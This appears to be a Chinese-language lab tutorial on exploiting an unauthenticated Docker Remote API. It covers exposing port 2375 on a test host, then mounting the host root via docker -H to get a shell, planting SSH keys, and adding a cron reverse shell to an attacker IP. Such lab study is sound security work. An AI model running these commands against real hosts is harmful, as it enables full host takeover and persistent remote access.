云安全笔记 | 您所在的位置:网站首页 › docker未授权访问 › 云安全笔记 |
漏洞简介
该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 环境搭建为了更贴近实战,所以不使用vulhub搭建docker,直接在宿主机上直接搭建。 首先虚拟机创建一台linux 机器正常安装好docker 接着进行文件备份 cp /lib/systemd/system/docker.service /lib/systemd/system/docker.service.bak 接着编辑 vim /lib/systemd/system/docker.service 把下面一段代码加入文件结尾 [Service] ExecStart= ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock保存并退出编辑后,重载守护进程以及重启Docker: sudo systemctl daemon-reload sudo service docker restart 通过执行命令查看是否开放了远程访问端口: systemctl status docker.service 如果本地搭建访问不了的话,很大原因是因为防火墙未放行2375端口,放行端口后就可以在其他机器访问到了。 漏洞检测+利用访问192.168.1.11:2375/version,若能访问,证明存在未授权访问漏洞。 目标机:192.168.1.11 攻击机:192.168.1.10 写入密钥免密登陆在已经安装docker的vps上,使用-H参数连接目标主机的docker,使用images命令查询目标系统存在的镜像。 使用docker命令创建一个容器,并将宿主机的磁盘挂载到容器中 docker -H tcp://192.168.1.11:2375 run -it -v /:/mnt a98b9e39cc6d /bin/bash a98b9e39cc6d 是镜像的ID 这条命令的意思是启动一个image ID 为a98b9e39cc6d的容器,并且将该宿主机的根目录挂在到容器的/mnt目录下 如果目标机器上没有镜像就需要先pull一个镜像到目标机上。 docker -H tcp://192.168.1.11:2375 pull busybox 这个镜像很小,方便下载。 有镜像之后就很方便利用了。 docker -H tcp://192.168.1.11:2375 run -it -v /:/mnt 62aedd01bd85 /bin/bash 启动之后就会获得该容器宿主机的shell 因为我们把主机的根目录挂在到了这个容器的/mnt容器下,所以我们可以直接往主机的/root/.ssh目录下写authorized_keys 我们将攻击机的公钥写入authorized_keys 成功免密登陆目标服务器 前面的操作都一致 唯一不同的就是写的命令和路径 有很多种写计划任务的方法 我这里是写入的/var/spool/cron下 把下面一句话写入目录的root文件里 */1 * * * * /bin/bash -i>&/dev/tcp/192.168.1.10/44444 0>&1 然后开启监听44444端口,稍等一分钟shell就会反弹回来。 |
CopyRight 2018-2019 实验室设备网 版权所有 |